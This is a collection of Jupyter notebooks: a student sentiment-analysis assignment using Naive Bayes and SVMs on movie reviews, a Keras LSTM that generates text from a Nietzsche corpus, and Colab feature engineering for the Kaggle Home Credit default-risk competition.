# Returns a bag of word object created from the given indices.
#
def create_bag_of_words(self, indices, indices_sentiment):
bag_of_words = BagOfWords(self.get_positive_prior(indices, indices_sentiment))
relevant_reviews = self.get_relevant_reviews(indices, indices_sentiment)
for review in relevant_reviews:
for word in self.get_words_of_review(review):
bag_of_words.add_word(word, review['sentiment'])
return bag_of_words
#
# Given the train indices, gets the positive prior. (positive reviews / total reviews)
#
def get_positive_prior(self, indices, indices_sentiment):
n_positive = 0
n_total = 0
for review in reviews:
if not review['cv'] in indices:
continue
if len(indices_sentiment) > 0:
if indices_sentiment[indices.index(review['cv'])] != "BOTH":
if indices_sentiment[indices.index(review['cv'])] != review['sentiment']:
continue
if review['sentiment'] == 'POS':
n_positive += 1
n_total += 1
return n_positive / n_total
#
# Returns a list of the relevant reviews.
# - Only reviews with the given indices
# - If self.sentiment != "BOTH" only returns reviews of the same sentiment.
#
def get_relevant_reviews(self, indices, indices_sentiment):
relevant_reviews = []
for review in reviews:
if not review['cv'] in indices:
continue
if len(indices_sentiment) > 0:
if indices_sentiment[indices.index(review['cv'])] != "BOTH":
if indices_sentiment[indices.index(review['cv'])] != review['sentiment']:
continue
relevant_reviews.append(review)
return relevant_reviews
def get_words_of_review(self, review):
words = []
for line in review['content']:
for word_pair in line:
word = word_pair[0].lower()
if self.use_stemming:
word = self.stemmer.stem(word)
words.append(word)
ngrams = []
for i in range(0, self.n_grams):
for j in range(0, len(words) - i):
ngram_word = ""
for k in range(0, i+1):
ngram_word += "{}\\".format(words[j+k])
ngrams.append(ngram_word)
return ngrams
bayes = BayesClassifier(False, False, 1)
train_indices = list(range(0,900))
test_indices = list(range(900, 1000))
simple_bayes_accuracy, simple_bayes_results = bayes.train_and_classify(train_indices, test_indices)
print("Simple (no smoothing) bayes accuracy {0:.2f}%".format(simple_bayes_accuracy))
```
#### (Bonus Questions) Would you consider accuracy to also be a good way to evaluate your classifier in a situation where 90% of your data instances are of positive movie reviews? (1pt)
You can simulate this scenario by keeping the positive reviews
data unchanged, but only using negative reviews cv000–cv089 for
training, and cv900–cv909 for testing. Calculate the classification
accuracy, and explain what changed.
```
# Question is very vague, but here is what we think the data should look like:
# TRAIN
# 0 - 899 : positive reviews
# 0 - 89 : negative reviews
#
# TEST
# 900 - 999 : positive reviews
# 900 - 909 : negative reviews
#
bayes = BayesClassifier(False, False, 1)
train_indices = list(range(0,900))
train_sentiment = []
# For review 0 - 89 say that we want BOTH the positive and negative reviews.
# For review 90 - 899 say that we want only the POS reviews.
for i in range(0, len(train_indices)):
if i < 90:
train_sentiment.append("BOTH")
else:
train_sentiment.append("POS")
test_indices = list(range(900, 1000))
test_sentiment = []
# For review 900 - 909 say that we want BOTH the positive and negative reviews.
# For review 910 - 999 say that we want only the POS reviews.
for i in range(0, len(test_indices)):
if i < 10:
test_sentiment.append("BOTH")
else:
test_sentiment.append("POS")
simple_negative_bayes_accuracy, simple_negative_bayes_results = bayes.train_and_classify(train_indices, test_indices, train_sentiment, test_sentiment)
print("Simple (no smoothing) bayes accuracy trained on 90% positive reviews {0:.2f}%".format(simple_negative_bayes_accuracy))
```
As you can see the classifier behaves badly now with only 9.09% accuracy. It predicts everything as a negative review. This is because it says very little negative reviews in the training data, and thus, each negative term in the training set will count 10 times more as each positive term in the training data. Meaning that a lot of negative words will have a high probability, explaining why everything gets predicted as negative.
## Smoothing
The presence of words in the test dataset that
haven’t been seen during training can cause probabilities in the Naive
Bayes classifier to be $0$, thus making that particular test instance
undecidable. The standard way to mitigate this effect (as well as to
give more clout to rare words) is to use smoothing, in which the
probability fraction
$$\frac{\text{count}(w_i, c)}{\sum\limits_{w\in V} \text{count}(w, c)}$$ for a word
$w_i$ becomes
$$\frac{\text{count}(w_i, c) + \text{smoothing}(w_i)}{\sum\limits_{w\in V} \text{count}(w, c) + \sum\limits_{w \in V} \text{smoothing}(w)}$$
#### (Q3.2) Implement Laplace feature smoothing (1pt)
($smoothing(\cdot) = \kappa$, constant for all words) in your Naive
Bayes classifier’s code, and report the impact on performance.
Use $\kappa = 1$.
```
bayes = BayesClassifier(True, False, 1)
train_indices = list(range(0,900))
test_indices = list(range(900, 1000))
smoothing_bayes_accuracy, smoothing_bayes_results = bayes.train_and_classify(train_indices, test_indices)
print("Smoothed bayes accuracy {0:.2f}%".format(smoothing_bayes_accuracy))
```
#### (Q3.3) Is the difference between non smoothed (Q3.1) and smoothed (Q3.2) statistically significant? (0.5pt)
```
p_value = sign_test(simple_bayes_results, smoothing_bayes_results)
print("p_value =", p_value)
```
## Cross-validation
A serious danger in using Machine Learning on small datasets, with many
iterations of slightly different versions of the algorithms, is that we
end up with Type III errors, also called the “testing hypotheses
suggested by the data” errors. This type of error occurs when we make
repeated improvements to our classifiers by playing with features and
their processing, but we don’t get a fresh, never-before seen test
dataset every time. Thus, we risk developing a classifier that’s better
and better on our data, but worse and worse at generalizing to new,
never-before seen data.
A simple method to guard against Type III errors is to use
cross-validation. In N-fold cross-validation, we divide the data into N
distinct chunks / folds. Then, we repeat the experiment N times, each
time holding out one of the chunks for testing, training our classifier
on the remaining N - 1 data chunks, and reporting performance on the
held-out chunk. We can use different strategies for dividing the data:
- Consecutive splitting:
- cv000–cv099 = Split 1
- cv100–cv199 = Split 2
- etc.
- Round-robin splitting (mod 10):
- cv000, cv010, cv020, … = Split 1
- cv001, cv011, cv021, … = Split 2
- etc.
- Random sampling/splitting
- Not used here (but you may choose to split this way in a non-educational situation)
#### (Q3.4) Write the code to implement 10-fold cross-validation using round-robin splitting for your Naive Bayes classifier from Q3.2 and compute the 10 accuracies. Report the final performance, which is the average of the performances per fold. If all splits perform equally well, this is a good sign. (1pt)
```
#
# Returns test_indices, and train_indices according to the round robin split algorithm.
#
def round_robin_split_indices(n_split):
test_indices = []
train_indices = []
for i in range(0, 1000):
if i % 10 == n_split:
test_indices.append(i)
else:
train_indices.append(i)
return test_indices, train_indices
#
# Performs the kfold validation.
#
def do_kfold(use_smoothing=False, use_stemming=False, n_grams=1):
sum_accuracy = 0
accuracies = []
total_variance = 0
all_results = []
bayes = BayesClassifier(use_smoothing, use_stemming, n_grams)
for i in range(0, 10):
print("Progress {0:.0f}%".format(i / 10 * 100))
test_indices, train_indices = round_robin_split_indices(i)
accuracy, result = bayes.train_and_classify(train_indices, test_indices)
sum_accuracy += accuracy
accuracies.append(accuracy)
for r in result:
all_results.append(r)
avg_accuracy = sum_accuracy / 10
for i in range(0, 10):
sqred_error = (accuracies[i] - avg_accuracy)**2
total_variance += sqred_error
variance_accuracy = total_variance / 10
return avg_accuracy, variance_accuracy, all_results
smoothing_avg_accuracy, smoothing_variance, smoothing_results_kfold = do_kfold(True, False, 1)
print("10-fold validation average accuracy for 10 folds: {0:.2f}%".format(smoothing_avg_accuracy))
```
#### (Q3.5) Write code to calculate and report variance, in addition to the final performance. (1pt)
**Please report all future results using 10-fold cross-validation now
(unless told to use the held-out test set).**
```
print("10-fold validation variance: {0:.2f}".format(smoothing_variance))
```
## Features, overfitting, and the curse of dimensionality
In the Bag-of-Words model, ideally we would like each distinct word in
the text to be mapped to its own dimension in the output vector
representation. However, real world text is messy, and we need to decide
on what we consider to be a word. For example, is “`word`" different
from “`Word`", from “`word`”, or from “`words`"? Too strict a
definition, and the number of features explodes, while our algorithm
fails to learn anything generalisable. Too lax, and we risk destroying
our learning signal. In the following section, you will learn about
confronting the feature sparsity and the overfitting problems as they
occur in NLP classification tasks.
#### (Q3.6): A touch of linguistics (1pt)
Taking a step further, you can use stemming to
hash different inflections of a word to the same feature in the BoW
vector space. How does the performance of your classifier change when
you use stemming on your training and test datasets? Please use the [Porter stemming
algorithm](http://www.nltk.org/howto/stem.html) from NLTK.
Also, you should do cross validation and concatenate the predictions from all folds to compute the significance.
```
stemming_avg_accuracy, stemming_variance, stemming_results_kfold = do_kfold("BOTH", True, True)
print("10-fold stemming average accuracy {0:.2f}%".format(stemming_avg_accuracy))
```
#### (Q3.7): Is the difference between NB with smoothing and NB with smoothing+stemming significant? (0.5pt)
```
p_value = sign_test(stemming_results_kfold, smoothing_results_kfold)
print("p_value =", p_value)
```
#### Q3.8: What happens to the number of features (i.e., the size of the vocabulary) when using stemming as opposed to (Q3.2)? (0.5pt)
Give actual numbers. You can use the held-out training set to determine these.
```
bayes = BayesClassifier(False, False, 1)
bayes_stemming = BayesClassifier(False, True, 1)
train_indices = list(range(0, 900))
bow = bayes.train(train_indices, [])
bow_stemming = bayes_stemming.train(train_indices, [])
print("Number of words withouth stemming: {}".format(bow.get_n_unique_words()))
print("Number of words with stemming: {}".format(bow_stemming.get_n_unique_words()))
```
#### Q3.9: Putting some word order back in (0.5+0.5pt=1pt)
A simple way of retaining some of the word
order information when using bag-of-words representations is to add **n-grams** features.
Retrain your classifier from (Q3.4) using **unigrams+bigrams** and
**unigrams+bigrams+trigrams** as features, and report accuracy and statistical significances (in comparison to the experiment at (Q3.4) for all 10 folds, and between the new systems).
```
bigram_avg_accuracy, bigram_variance, bigram_results_kfold = do_kfold(True, False, 2)
trigram_avg_accuracy, trigram_variance, trigram_results_kfold = do_kfold(True, False, 3)
print("Unigram average accuracy {0:.2f}%".format(smoothing_avg_accuracy))
print("Bigram average accuracy {0:.2f}%".format(bigram_avg_accuracy))
print("Trigram average accuracy {0:.2f}%".format(trigram_avg_accuracy))
print("Improvement from unigrams to unigrams+bigrams")
p_value = sign_test(bigram_results_kfold, smoothing_results_kfold)
print("p_value =", p_value)
print("\n\nImprovement from unigrams+bigrams to unigrams+bigrams+trigrams")
p_value = sign_test(bigram_results_kfold, trigram_results_kfold)
print("p_value =", p_value)
```
#### Q3.10: How many features does the BoW model have to take into account now? (0.5pt)
How does this number compare (e.g., linear, square, cubed, exponential) to the number of features at (Q3.8)?
Use the held-out training set once again for this.
```
bayes_bigrams = BayesClassifier(False, False, 2)
bayes_trigrams = BayesClassifier(False, False, 3)
bayes_fourgrams = BayesClassifier(False, False, 4)
train_indices = list(range(0, 900))
bow_bigrams = bayes_bigrams.train(train_indices, [])
bow_trigrams = bayes_trigrams.train(train_indices, [])
print("Number of features with unigrams: {}".format(bow.get_n_unique_words()))
print("Number of features with bigrams: {}".format(bow_bigrams.get_n_unique_words()))
print("Number of features with trigrams: {}".format(bow_trigrams.get_n_unique_words()))
```
As you can see the number of features goes from ~50,000 to ~500,000 to ~1,500,000 this shows that the increase in features is exponential
# Support Vector Machines (4pts)
Though simple to understand, implement, and debug, one
major problem with the Naive Bayes classifier is that its performance
deteriorates (becomes skewed) when it is being used with features which
are not independent (i.e., are correlated). Another popular classifier
that doesn’t scale as well to big data, and is not as simple to debug as
Naive Bayes, but that doesn’t assume feature independence is the Support
Vector Machine (SVM) classifier.
You can find more details about SVMs in Chapter 7 of Bishop: Pattern Recognition and Machine Learning.
Other sources for learning SVM:
* http://web.mit.edu/zoya/www/SVM.pdf
* http://www.cs.columbia.edu/~kathy/cs4701/documents/jason_svm_tutorial.pdf
* https://pythonprogramming.net/support-vector-machine-intro-machine-learning-tutorial/
Use the scikit-learn implementation of
[SVM.](http://scikit-learn.org/stable/modules/svm.html) with the default parameters.
#### (Q4.1): Train SVM and compare to Naive Bayes (2pt)
Train an SVM classifier (sklearn.svm.LinearSVC) using your features. Compare the
classification performance of the SVM classifier to that of the Naive
Bayes classifier from (Q3.4) and report the numbers.
Do cross validation and concatenate the predictions from all folds to compute the significance. Are the results significantly better?
```
from sklearn import preprocessing, model_selection, neighbors, svm
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.svm import LinearSVC as SVC
from nltk.tokenize import TreebankWordTokenizer
#
## Returns test_indices, and train_indices according to the round robin split algorithm.
## adjusted to before, as features object has 2000 rows and not just 1000
#
def round_robin_split_indices_features(n_split):
test_indices = []
train_indices = []
test_indices_features = []
for i in range(0, 1000):
if i % 10 == n_split:
test_indices.append(i)
else:
train_indices.append(i)
test_indices_features = test_indices + [x + 1000 for x in test_indices]
train_indices_features = train_indices + [x + 1000 for x in train_indices]
return train_indices_features, train_indices, test_indices_features, test_indices
# example: split 5 is testsplit at the moment
#train_features, train_ind, test_features, test_ind = round_robin_split_indices(5)
#
## vectorizes original text documents
#
def get_vectorized_corpus(reviews, indices, tags, without_closed):
corpus = []
for review in reviews:
if (review['cv'] not in indices):
continue
words = []
word_tag = []
for line in review['content']:
for word_pair in line:
word = word_pair[0].lower()
if(tags != False):
tag = word_pair[1]
if(without_closed != False):
if(tag.startswith(('V', 'N', 'RB', 'J'))):
word_tag = word + "_" + tag
else:
continue
else:
word_tag = word + "_" + tag
else:
word_tag = word
words.append(word_tag)
corpus.append(' '.join(map(str, words)))
count_vect = CountVectorizer(tokenizer = TreebankWordTokenizer().tokenize)
vectorized_features = count_vect.fit_transform(corpus).toarray()
return vectorized_features
#
## get original sentiment labels
#
def get_labels(reviews, indices):
labels = []
for review in reviews:
if (review['cv'] not in indices):
continue
else:
labels.append(review["sentiment"])
return labels
#
## for obtained indices, one svm is fitted and evaluated according to training and test documents
#
def train_and_classify_one_svm(features, train_indices_features, train_indices, test_indices_features, test_indices):
# training indices
train_features = features[train_indices_features]
train_labels = get_labels(reviews, train_indices)
# test indices
test_features = features[test_indices_features]
test_labels = get_labels(reviews, test_indices)
# linear SVM on training feature vector and labels
classifier = SVC()
classifier.fit(train_features, train_labels)
# label prediction for test_feature vector
label_prediction = classifier.predict(test_features)
# tracking results
total = 0
correct = 0
results = []
for i in range(0, len(test_labels)):
if label_prediction[i] == test_labels[i]:
correct += 1
results.append('+')
else:
results.append('-')
total += 1
accuracy = correct / total * 100
return accuracy, results
#
## similar to NB, kfold for SVM (only difference are slightly different indices (due to structure of feature object))
#
def do_kfold_svm(tags=False, without_closed=False):
# create features depending on type of tags [notags, alltags, withoutclosedform]
features = get_vectorized_corpus(reviews, list(range(0,1000)), tags, without_closed)
sum_accuracy = 0
accuracies = []
total_variance = 0
all_results = []
for i in range(0, 10):
print("Progress {0:.0f}%".format(i / 10 * 100))
train_features, train_ind, test_features, test_ind = round_robin_split_indices_features(i)
accuracy, results = train_and_classify_one_svm(features, train_features, train_ind, test_features, test_ind)
sum_accuracy += accuracy
accuracies.append(accuracy)
for r in results:
all_results.append(r)
avg_accuracy = sum_accuracy / 10
for i in range(0, 10):
sqred_error = (accuracies[i] - avg_accuracy)**2
total_variance += sqred_error
variance_accuracy = total_variance / 10
return avg_accuracy, variance_accuracy, all_results
# calculate svm kfold
svm_avg_accuracy, svm_variance, svm_results_kfold = do_kfold_svm()
print("10-fold average accuracy {0:.2f}%".format(svm_avg_accuracy))
print("10-fold accuracy variance {0:.2f}%".format(svm_variance))
# significant difference to Q3.4?
p_value = sign_test(smoothing_results_kfold, svm_results_kfold)
print("p_value =", p_value)
```
### More linguistics
Now add in part-of-speech features. You will find the
movie review dataset has already been POS-tagged for you. Try to
replicate what Pang et al. were doing:
#### (Q4.2) Replace your features with word+POS features, and report performance with the SVM. Does this help? Do cross validation and concatenate the predictions from all folds to compute the significance. Are the results significant? Why? (1pt)
```
# What canges, when pos tags are taken into consideration as well?
svm_avg_accuracy_with_tags, svm_variance_with_tags, svm_results_kfold_with_tags = do_kfold_svm(tags=True)
print("10-fold average accuracy {0:.2f}%".format(svm_avg_accuracy_with_tags))
print("10-fold accuracy variance {0:.2f}%".format(svm_variance_with_tags))
# significant difference to Q3.4?
p_value = sign_test(svm_results_kfold, svm_results_kfold_with_tags)
print("p_value =", p_value)
```
#### (Q4.3) Discard all closed-class words from your data (keep only nouns (N*), verbs (V*), adjectives (J*) and adverbs (RB*)), and report performance. Does this help? Do cross validation and concatenate the predictions from all folds to compute the significance. Are the results significantly better than when we don't discard the closed-class words? Why? (1pt)
```
svm_avg_accuracy_without_closed, svm_variance_without_closed, svm_results_kfold_without_closed = do_kfold_svm(tags=True, without_closed=True)
print("10-fold average accuracy {0:.2f}%".format(svm_avg_accuracy_without_closed))
print("10-fold accuracy variance {0:.2f}%".format(svm_variance_without_closed))
# significant difference to all POS tags allowed?
p_value = sign_test(svm_results_kfold_with_tags, svm_results_kfold_without_closed)
print("p_value =", p_value)
```
# (Q5) Discussion (max. 500 words). (5pts)
> Based on your experiments, what are the effective features and techniques in sentiment analysis? What information do different features encode?
Why is this important? What are the limitations of these features and techniques?
*Write your answer here in max. 500 words.*
Discussion:
effective features:
- Smoothing, thus not excluding words, that are not seen in the training data, but give them a non zero probability, leads to significantly better accuracy, than Naive Bayes without smoothing.
- Stemming:
# Submission
```
# Write your names and student numbers here:
# Dirk Hoekstra #12283878
# Philipp Lintl #12152498
```
**That's it!**
- Check if you answered all questions fully and correctly.
- Download your completed notebook using `File -> Download .ipynb`
- Also save your notebook as a Github Gist. Get it by choosing `File -> Save as Github Gist`. Make sure that the gist has a secret link (not public).
- Check if your answers are all included in the file you submit (e.g. check the Github Gist URL)
- Submit your .ipynb file and link to the Github Gist via *Canvas*. One submission per group.
|
github_jupyter
|
```
from keras.models import Sequential
from keras.layers import Dense, Activation
from keras.layers import LSTM
from keras.optimizers import RMSprop
from keras.utils.data_utils import get_file
import numpy as np
import random
import sys
path = get_file('nietzsche.txt', origin='https://s3.amazonaws.com/text-datasets/nietzsche.txt')
text = open(path).read().lower()
print('corpus length:', len(text))
chars = sorted(list(set(text)))
print('total chars:', len(chars))
char_indices = dict((c, i) for i, c in enumerate(chars))
indices_char = dict((i, c) for i, c in enumerate(chars))
maxlen = 40 # この長さのテキストに分割する
step = 3 # オーバーラップ
sentences = []
next_chars = []
for i in range(0, len(text) - maxlen, step):
sentences.append(text[i: i + maxlen]) # 入力となる長さ40の文字列
next_chars.append(text[i + maxlen]) # 予測したい次の文字
print('num sequences:', len(sentences))
len(sentences[0]), sentences[0]
next_chars[0]
print('Vectorization...')
# 入力は長さ maxlen の文字列なのでmaxlenが必要
X = np.zeros((len(sentences), maxlen, len(chars)), dtype=np.bool)
# 出力は1文字しかないので maxlen は不要
y = np.zeros((len(sentences), len(chars)), dtype=np.bool)
for i, sentence in enumerate(sentences):
for t, char in enumerate(sentence):
X[i, t, char_indices[char]] = 1 # 対象文字のみTrueとなるベクトルにする
y[i, char_indices[next_chars[i]]] = 1
print(X.shape, y.shape)
print(X[0][0])
print(y[0])
print('Build model...')
model = Sequential()
# LSTMの入力は (バッチ数, 入力シーケンスの長さ, 入力の次元) となる(バッチ数は省略)
# maxlenを変えてもパラメータ数は変化しない(各時刻でパラメータは共有するため)
# 128は内部の射影と出力の次元(同じになる)
model.add(LSTM(128, input_shape=(maxlen, len(chars))))
# 出力の128次元にさらにFCをくっつけて文字ベクトルを出力
model.add(Dense(len(chars))) # 出力
model.add(Activation('softmax'))
model.summary()
optimizer = RMSprop(lr=0.01)
model.compile(loss='categorical_crossentropy', optimizer=optimizer)
# 200285個の長さ40の時系列データ(各データは57次元ベクトル)の意味
print(X.shape, y.shape)
def sample(preds, temperature=1.0):
preds = np.asarray(preds).astype('float64')
# temperatureによって確率が変わる???
preds = np.log(preds) / temperature
exp_preds = np.exp(preds)
preds = exp_preds / np.sum(exp_preds)
probas = np.random.multinomial(1, preds, 1)
# 確率が最大のインデックスを返す
return np.argmax(probas)
for iteration in range(1, 60):
print()
print('-' * 50)
print('Iteration', iteration)
# 時系列データを入力して学習
# model.fit(X, y, batch_size=128, epochs=1)
# 学習データのランダムな位置の40文字に続く文字列を生成する
start_index = random.randint(0, len(text) - maxlen - 1)
generated = ''
sentence = text[start_index: start_index + maxlen]
generated += sentence
print('----- Generating with seed: "' + sentence + '"')
sys.stdout.write(generated)
# 400文字分生成する
# この400文字を生成している間、LSTMに内部状態が保持されている?
for i in range(400):
x = np.zeros((1, maxlen, len(chars)))
# sentenceを符号化
# このsentenceは400回のループで生成された文字を加えて次送りされていく
for t, char in enumerate(sentence):
x[0, t, char_indices[char]] = 1.0
# 57次元(文字数)の出力分布
# (系列長=40, データ次元=57) を入力
preds = model.predict(x, verbose=0)[0]
# もっとも確率が高いのを選ぶのではなくサンプリングする?
next_index = sample(preds, diversity)
next_char = indices_char[next_index]
generated += next_char
# 入力は長さ40にしたいので今生成した文字を加えて1つ先に送る
# このsentenceが次の入力となる
sentence = sentence[1:] + next_char
sys.stdout.write(next_char)
sys.stdout.flush()
```
|
github_jupyter
|
```
from google.colab import files
files.upload()
!mkdir -p ~/.kaggle
!cp kaggle.json ~/.kaggle/
!pip install kaggle
!chmod 600 /root/.kaggle/kaggle.json
!kaggle competitions download -c home-credit-default-risk
!unzip \*.zip -d dataset
!rm -R sample_data
!rm *zip *csv
import os
import gc
import numpy as np
import pandas as pd
import multiprocessing as mp
from scipy.stats import kurtosis
from sklearn.metrics import roc_auc_score
from sklearn.preprocessing import MinMaxScaler
from sklearn.impute import SimpleImputer
from sklearn.linear_model import LogisticRegression
import matplotlib.pyplot as plt
import seaborn as sns
import warnings
from sklearn.model_selection import train_test_split, cross_val_score, StratifiedKFold, KFold
import xgboost as xgb
from xgboost import XGBClassifier
from functools import partial
from sklearn.ensemble import RandomForestClassifier
import lightgbm as lgb
warnings.simplefilter(action='ignore', category=FutureWarning)
DATA_DIRECTORY = "/content/dataset"
df_train = pd.read_csv(os.path.join(DATA_DIRECTORY, 'application_train.csv'))
df_test = pd.read_csv(os.path.join(DATA_DIRECTORY, 'application_test.csv'))
df = df_train.append(df_test)
del df_train, df_test; gc.collect()
df = df[df['AMT_INCOME_TOTAL'] < 20000000]
df = df[df['CODE_GENDER'] != 'XNA']
df['DAYS_EMPLOYED'].replace(365243, np.nan, inplace=True)
df['DAYS_LAST_PHONE_CHANGE'].replace(0, np.nan, inplace=True)
def get_age_group(days_birth):
age_years = -days_birth / 365
if age_years < 27: return 1
elif age_years < 40: return 2
elif age_years < 50: return 3
elif age_years < 65: return 4
elif age_years < 99: return 5
else: return 0
docs = [f for f in df.columns if 'FLAG_DOC' in f]
df['DOCUMENT_COUNT'] = df[docs].sum(axis=1)
df['NEW_DOC_KURT'] = df[docs].kurtosis(axis=1)
df['AGE_RANGE'] = df['DAYS_BIRTH'].apply(lambda x: get_age_group(x))
df['EXT_SOURCES_PROD'] = df['EXT_SOURCE_1'] * df['EXT_SOURCE_2'] * df['EXT_SOURCE_3']
df['EXT_SOURCES_WEIGHTED'] = df.EXT_SOURCE_1 * 2 + df.EXT_SOURCE_2 * 1 + df.EXT_SOURCE_3 * 3
np.warnings.filterwarnings('ignore', r'All-NaN (slice|axis) encountered')
for function_name in ['min', 'max', 'mean', 'nanmedian', 'var']:
feature_name = 'EXT_SOURCES_{}'.format(function_name.upper())
df[feature_name] = eval('np.{}'.format(function_name))(
df[['EXT_SOURCE_1', 'EXT_SOURCE_2', 'EXT_SOURCE_3']], axis=1)
df['CREDIT_TO_ANNUITY_RATIO'] = df['AMT_CREDIT'] / df['AMT_ANNUITY']
df['CREDIT_TO_GOODS_RATIO'] = df['AMT_CREDIT'] / df['AMT_GOODS_PRICE']
df['ANNUITY_TO_INCOME_RATIO'] = df['AMT_ANNUITY'] / df['AMT_INCOME_TOTAL']
df['CREDIT_TO_INCOME_RATIO'] = df['AMT_CREDIT'] / df['AMT_INCOME_TOTAL']
df['INCOME_TO_EMPLOYED_RATIO'] = df['AMT_INCOME_TOTAL'] / df['DAYS_EMPLOYED']
df['INCOME_TO_BIRTH_RATIO'] = df['AMT_INCOME_TOTAL'] / df['DAYS_BIRTH']
df['EMPLOYED_TO_BIRTH_RATIO'] = df['DAYS_EMPLOYED'] / df['DAYS_BIRTH']
df['ID_TO_BIRTH_RATIO'] = df['DAYS_ID_PUBLISH'] / df['DAYS_BIRTH']
df['CAR_TO_BIRTH_RATIO'] = df['OWN_CAR_AGE'] / df['DAYS_BIRTH']
df['CAR_TO_EMPLOYED_RATIO'] = df['OWN_CAR_AGE'] / df['DAYS_EMPLOYED']
df['PHONE_TO_BIRTH_RATIO'] = df['DAYS_LAST_PHONE_CHANGE'] / df['DAYS_BIRTH']
def do_mean(df, group_cols, counted, agg_name):
gp = df[group_cols + [counted]].groupby(group_cols)[counted].mean().reset_index().rename(
columns={counted: agg_name})
df = df.merge(gp, on=group_cols, how='left')
del gp
gc.collect()
return df
def do_median(df, group_cols, counted, agg_name):
gp = df[group_cols + [counted]].groupby(group_cols)[counted].median().reset_index().rename(
columns={counted: agg_name})
df = df.merge(gp, on=group_cols, how='left')
del gp
gc.collect()
return df
def do_std(df, group_cols, counted, agg_name):
gp = df[group_cols + [counted]].groupby(group_cols)[counted].std().reset_index().rename(
columns={counted: agg_name})
df = df.merge(gp, on=group_cols, how='left')
del gp
gc.collect()
return df
def do_sum(df, group_cols, counted, agg_name):
gp = df[group_cols + [counted]].groupby(group_cols)[counted].sum().reset_index().rename(
columns={counted: agg_name})
df = df.merge(gp, on=group_cols, how='left')
del gp
gc.collect()
return df
group = ['ORGANIZATION_TYPE', 'NAME_EDUCATION_TYPE', 'OCCUPATION_TYPE', 'AGE_RANGE', 'CODE_GENDER']
df = do_median(df, group, 'EXT_SOURCES_MEAN', 'GROUP_EXT_SOURCES_MEDIAN')
df = do_std(df, group, 'EXT_SOURCES_MEAN', 'GROUP_EXT_SOURCES_STD')
df = do_mean(df, group, 'AMT_INCOME_TOTAL', 'GROUP_INCOME_MEAN')
df = do_std(df, group, 'AMT_INCOME_TOTAL', 'GROUP_INCOME_STD')
df = do_mean(df, group, 'CREDIT_TO_ANNUITY_RATIO', 'GROUP_CREDIT_TO_ANNUITY_MEAN')
df = do_std(df, group, 'CREDIT_TO_ANNUITY_RATIO', 'GROUP_CREDIT_TO_ANNUITY_STD')
df = do_mean(df, group, 'AMT_CREDIT', 'GROUP_CREDIT_MEAN')
df = do_mean(df, group, 'AMT_ANNUITY', 'GROUP_ANNUITY_MEAN')
df = do_std(df, group, 'AMT_ANNUITY', 'GROUP_ANNUITY_STD')
def label_encoder(df, categorical_columns=None):
if not categorical_columns:
categorical_columns = [col for col in df.columns if df[col].dtype == 'object']
for col in categorical_columns:
df[col], uniques = pd.factorize(df[col])
return df, categorical_columns
def drop_application_columns(df):
drop_list = [
'CNT_CHILDREN', 'CNT_FAM_MEMBERS', 'HOUR_APPR_PROCESS_START',
'FLAG_EMP_PHONE', 'FLAG_MOBIL', 'FLAG_CONT_MOBILE', 'FLAG_EMAIL', 'FLAG_PHONE',
'FLAG_OWN_REALTY', 'REG_REGION_NOT_LIVE_REGION', 'REG_REGION_NOT_WORK_REGION',
'REG_CITY_NOT_WORK_CITY', 'OBS_30_CNT_SOCIAL_CIRCLE', 'OBS_60_CNT_SOCIAL_CIRCLE',
'AMT_REQ_CREDIT_BUREAU_DAY', 'AMT_REQ_CREDIT_BUREAU_MON', 'AMT_REQ_CREDIT_BUREAU_YEAR',
'COMMONAREA_MODE', 'NONLIVINGAREA_MODE', 'ELEVATORS_MODE', 'NONLIVINGAREA_AVG',
'FLOORSMIN_MEDI', 'LANDAREA_MODE', 'NONLIVINGAREA_MEDI', 'LIVINGAPARTMENTS_MODE',
'FLOORSMIN_AVG', 'LANDAREA_AVG', 'FLOORSMIN_MODE', 'LANDAREA_MEDI',
'COMMONAREA_MEDI', 'YEARS_BUILD_AVG', 'COMMONAREA_AVG', 'BASEMENTAREA_AVG',
'BASEMENTAREA_MODE', 'NONLIVINGAPARTMENTS_MEDI', 'BASEMENTAREA_MEDI',
'LIVINGAPARTMENTS_AVG', 'ELEVATORS_AVG', 'YEARS_BUILD_MEDI', 'ENTRANCES_MODE',
'NONLIVINGAPARTMENTS_MODE', 'LIVINGAREA_MODE', 'LIVINGAPARTMENTS_MEDI',
'YEARS_BUILD_MODE', 'YEARS_BEGINEXPLUATATION_AVG', 'ELEVATORS_MEDI', 'LIVINGAREA_MEDI',
'YEARS_BEGINEXPLUATATION_MODE', 'NONLIVINGAPARTMENTS_AVG', 'HOUSETYPE_MODE',
'FONDKAPREMONT_MODE', 'EMERGENCYSTATE_MODE'
]
for doc_num in [2,4,5,6,7,9,10,11,12,13,14,15,16,17,19,20,21]:
drop_list.append('FLAG_DOCUMENT_{}'.format(doc_num))
df.drop(drop_list, axis=1, inplace=True)
return df
df, le_encoded_cols = label_encoder(df, None)
df = drop_application_columns(df)
#df = pd.get_dummies(df)
bureau = pd.read_csv(os.path.join(DATA_DIRECTORY, 'bureau.csv'))
bureau['CREDIT_DURATION'] = -bureau['DAYS_CREDIT'] + bureau['DAYS_CREDIT_ENDDATE']
bureau['ENDDATE_DIF'] = bureau['DAYS_CREDIT_ENDDATE'] - bureau['DAYS_ENDDATE_FACT']
bureau['DEBT_PERCENTAGE'] = bureau['AMT_CREDIT_SUM'] / bureau['AMT_CREDIT_SUM_DEBT']
bureau['DEBT_CREDIT_DIFF'] = bureau['AMT_CREDIT_SUM'] - bureau['AMT_CREDIT_SUM_DEBT']
bureau['CREDIT_TO_ANNUITY_RATIO'] = bureau['AMT_CREDIT_SUM'] / bureau['AMT_ANNUITY']
def one_hot_encoder(df, categorical_columns=None, nan_as_category=True):
original_columns = list(df.columns)
if not categorical_columns:
categorical_columns = [col for col in df.columns if df[col].dtype == 'object']
df = pd.get_dummies(df, columns=categorical_columns, dummy_na=nan_as_category)
categorical_columns = [c for c in df.columns if c not in original_columns]
return df, categorical_columns
def group(df_to_agg, prefix, aggregations, aggregate_by= 'SK_ID_CURR'):
agg_df = df_to_agg.groupby(aggregate_by).agg(aggregations)
agg_df.columns = pd.Index(['{}{}_{}'.format(prefix, e[0], e[1].upper())
for e in agg_df.columns.tolist()])
return agg_df.reset_index()
def group_and_merge(df_to_agg, df_to_merge, prefix, aggregations, aggregate_by= 'SK_ID_CURR'):
agg_df = group(df_to_agg, prefix, aggregations, aggregate_by= aggregate_by)
return df_to_merge.merge(agg_df, how='left', on= aggregate_by)
def get_bureau_balance(path, num_rows= None):
bb = pd.read_csv(os.path.join(path, 'bureau_balance.csv'))
